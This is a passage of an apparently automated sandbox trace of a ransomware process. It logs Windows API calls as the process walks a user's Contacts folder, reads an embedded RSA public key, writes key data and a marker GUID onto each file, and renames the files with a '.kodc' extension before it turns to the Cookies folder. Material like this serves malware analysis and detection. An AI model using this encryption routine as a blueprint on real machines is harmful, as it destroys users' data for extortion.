hHeap=0x630000) returned 1 [0097.521] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.521] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.521] CloseHandle (hObject=0x5cc) returned 1 [0097.529] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.529] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0097.529] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.529] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.kodc")) returned 1 [0097.530] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0097.530] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e88 | out: hHeap=0x630000) returned 1 [0097.530] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0097.532] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0097.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0097.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.532] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned=".contact" [0097.532] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.533] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=1172) returned 1 [0097.533] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.537] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x46e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.537] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e88 [0097.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e88 | out: hHeap=0x630000) returned 1 [0097.542] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.542] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x494, lpOverlapped=0x0) returned 1 [0097.542] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.542] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.542] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.542] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.543] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.543] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.544] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.544] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.544] GetLastError () returned 0x0 [0097.544] SetLastError (dwErrCode=0x0) [0097.544] GetLastError () returned 0x0 [0097.544] SetLastError (dwErrCode=0x0) [0097.544] GetLastError () returned 0x0 [0097.544] SetLastError (dwErrCode=0x0) [0097.544] GetLastError () returned 0x0 [0097.544] SetLastError (dwErrCode=0x0) [0097.544] GetLastError () returned 0x0 [0097.544] SetLastError (dwErrCode=0x0) [0097.544] GetLastError () returned 0x0 [0097.544] SetLastError (dwErrCode=0x0) [0097.544] GetLastError () returned 0x0 [0097.544] SetLastError (dwErrCode=0x0) [0097.544] GetLastError () returned 0x0 [0097.544] SetLastError (dwErrCode=0x0) [0097.544] GetLastError () returned 0x0 [0097.545] SetLastError (dwErrCode=0x0) [0097.545] GetLastError () returned 0x0 [0097.545] SetLastError (dwErrCode=0x0) [0097.545] GetLastError () returned 0x0 [0097.545] SetLastError (dwErrCode=0x0) [0097.545] GetLastError () returned 0x0 [0097.545] SetLastError (dwErrCode=0x0) [0097.545] GetLastError () returned 0x0 [0097.545] SetLastError (dwErrCode=0x0) [0097.545] GetLastError () returned 0x0 [0097.545] SetLastError (dwErrCode=0x0) [0097.545] GetLastError () returned 0x0 [0097.545] SetLastError (dwErrCode=0x0) [0097.545] GetLastError () returned 0x0 [0097.545] SetLastError (dwErrCode=0x0) [0097.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.545] GetLastError () returned 0x0 [0097.545] SetLastError (dwErrCode=0x0) [0097.545] GetLastError () returned 0x0 [0097.545] SetLastError (dwErrCode=0x0) [0097.545] GetLastError () returned 0x0 [0097.545] SetLastError (dwErrCode=0x0) [0097.545] GetLastError () returned 0x0 [0097.546] SetLastError (dwErrCode=0x0) [0097.546] GetLastError () returned 0x0 [0097.546] SetLastError (dwErrCode=0x0) [0097.546] GetLastError () returned 0x0 [0097.546] SetLastError (dwErrCode=0x0) [0097.546] GetLastError () returned 0x0 [0097.546] SetLastError (dwErrCode=0x0) [0097.546] GetLastError () returned 0x0 [0097.546] SetLastError (dwErrCode=0x0) [0097.546] GetLastError () returned 0x0 [0097.546] SetLastError (dwErrCode=0x0) [0097.546] GetLastError () returned 0x0 [0097.546] SetLastError (dwErrCode=0x0) [0097.546] GetLastError () returned 0x0 [0097.546] SetLastError (dwErrCode=0x0) [0097.546] GetLastError () returned 0x0 [0097.546] SetLastError (dwErrCode=0x0) [0097.546] GetLastError () returned 0x0 [0097.546] SetLastError (dwErrCode=0x0) [0097.546] GetLastError () returned 0x0 [0097.546] SetLastError (dwErrCode=0x0) [0097.546] GetLastError () returned 0x0 [0097.547] SetLastError (dwErrCode=0x0) [0097.547] GetLastError () returned 0x0 [0097.547] SetLastError (dwErrCode=0x0) [0097.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e88 [0097.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0097.547] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.547] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.547] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.547] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33332e8 [0097.547] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e88 | out: hHeap=0x630000) returned 1 [0097.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e88 [0097.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x490) returned 0x333b018 [0097.547] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33332e8 | out: hHeap=0x630000) returned 1 [0097.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33332e8 [0097.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333f570 [0097.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x3319f80 [0097.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb58 [0097.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a580 [0097.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a598 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5c8 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.548] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0097.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a598 | out: hHeap=0x630000) returned 1 [0097.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5c8 | out: hHeap=0x630000) returned 1 [0097.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5c8 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a598 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5c8 | out: hHeap=0x630000) returned 1 [0097.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a598 | out: hHeap=0x630000) returned 1 [0097.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.549] GetCurrentThreadId () returned 0x42c [0097.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x695ac8 [0097.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3333208 [0097.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.549] GetCurrentThreadId () returned 0x42c [0097.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a598 [0097.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0097.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5c8 [0097.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a550 [0097.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a490 [0097.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0097.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0097.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.552] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x494, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.552] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.552] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.552] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.552] CloseHandle (hObject=0x5cc) returned 1 [0097.560] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.kodc")) returned 1 [0097.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0097.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e88 | out: hHeap=0x630000) returned 1 [0097.561] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0097.562] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0097.562] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0097.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0097.562] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.562] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.562] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0097.562] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.563] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.563] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.563] PathFindFileNameW (pszPath="") returned="" [0097.563] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, 